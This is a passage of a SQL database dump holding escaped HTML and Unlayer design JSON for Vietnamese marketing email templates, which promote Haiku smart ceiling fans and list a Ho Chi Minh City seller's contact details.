style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 15px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: comic sans ms,sans-serif; font-size: 14px; color: #ffffff; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%; text-align: center;\\\"><span style=\\\"font-family: impact, chicago; line-height: 39.2px; font-size: 28px;\\\"><strong><span style=\\\"line-height: 39.2px;\\\">CONTACT US<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; color: #f1c40f; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 20px; font-weight: 400;\\\">The World\\u2019s Most Efficient Ceiling Fan<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 25px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #e4e4eb; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><strong>T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<\\/strong><br \\/><strong>EMAIL: sale@hogiaphat.vn\\u00a0<\\/strong><\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\">Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">WIT. \\u00a0All rights reserved.\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">Tax: 0315778682<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:259px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"259\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:259px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 20px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 20px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/facebook.com\\/hgpco\\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 20px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 20px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/twitter.com\\/hogiaphatco\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 20px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 20px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/whatsapp.com\\/hogiaphatco\\\" title=\\\"WhatsApp\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/whatsapp.png\\\" alt=\\\"WhatsApp\\\" title=\\\"WhatsApp\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 20px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 20px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/pinterest.com\\/hogiaphatco\\\" title=\\\"Pinterest\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/pinterest.png\\\" alt=\\\"Pinterest\\\" title=\\\"Pinterest\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/hgpco\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #1d3361;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #1d3361;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:12px 10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #ffffff; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%; text-align: center;\\\">\\u00a9 WIT Company. All Rights Reserved<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(4, 'Tổ chức đào tạo WIT', '', 1, 0, 1, 'vietnamese', '', 1, '2023-02-23 10:38:52', '#0362c0', 'Tổ chức đào tạo WIT', 1, 'Tổ chức đào tạo WIT', 'no-reply@hogiaphat.vn', 'sale@hogiaphat.vn', '', '2', '\"{\\\"counters\\\":{\\\"u_row\\\":14,\\\"u_column\\\":18,\\\"u_content_text\\\":14,\\\"u_content_image\\\":10,\\\"u_content_video\\\":1,\\\"u_content_button\\\":5,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":5},\\\"body\\\":{\\\"id\\\":\\\"ZKEsIo9cyJ\\\",\\\"rows\\\":[{\\\"id\\\":\\\"8v6X8_eWie\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"49F_V6CJYl\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Zre8H6uUHc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677121551729-logo-baf.gif\\\",\\\"width\\\":473,\\\"height\\\":282,\\\"maxWidth\\\":\\\"28%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"#bfd8d2\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"RKHaA3kNjd\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"sYJ1ipCk6A\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wb89yjmG82\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"80px 10px 15px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Montserrat\\\",\\\"value\\\":\\\"\'Montserrat\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 44px; line-height: 19.6px;\\\\\\\"><strong>HAIKU<\\/strong><\\/span><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 20px; line-height: 19.6px; font-family: inherit;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\"><strong>The Smart Ceiling Fan of the Future - Big Ass Fans<\\/strong><\\/span><\\/span><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"HAK8YEjON2\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px 30px 80px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-cao-cap-haiku-h\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#e03e2d\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Let\'s Start<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":114,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677121836979-01-h.jpg\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":600,\\\"height\\\":430,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gP8etI3XjW\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"IifB1_wM-O\\\",\\\"contents\\\":[{\\\"id\\\":\\\"GiDRLzAilF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_18\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_14\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"unikoM7yiA\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"h6wnCojqjn\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Ma_hPqaB5Q\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 40px 0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#e67e23\\\",\\\"textAlign\\\":\\\"right\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; font-size: 14px; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"font-size: 14px; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\">H E L L O<\\/span><\\/span><\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 28px; font-size: 20px;\\\\\\\"><span style=\\\\\\\"line-height: 28px;\\\\\\\"><strong>HAIKU SMART FANS<\\/strong><\\/span><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"lAKRlwZ56y\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677136007974-haiku-finishes.jpg\\\",\\\"width\\\":1200,\\\"height\\\":1200},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"0px\\\",\\\"borderRightColor\\\":\\\"#a5a5a5\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"2px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"0px\\\"},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"55FclmztDX\\\",\\\"contents\\\":[{\\\"id\\\":\\\"88IAIus72W\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"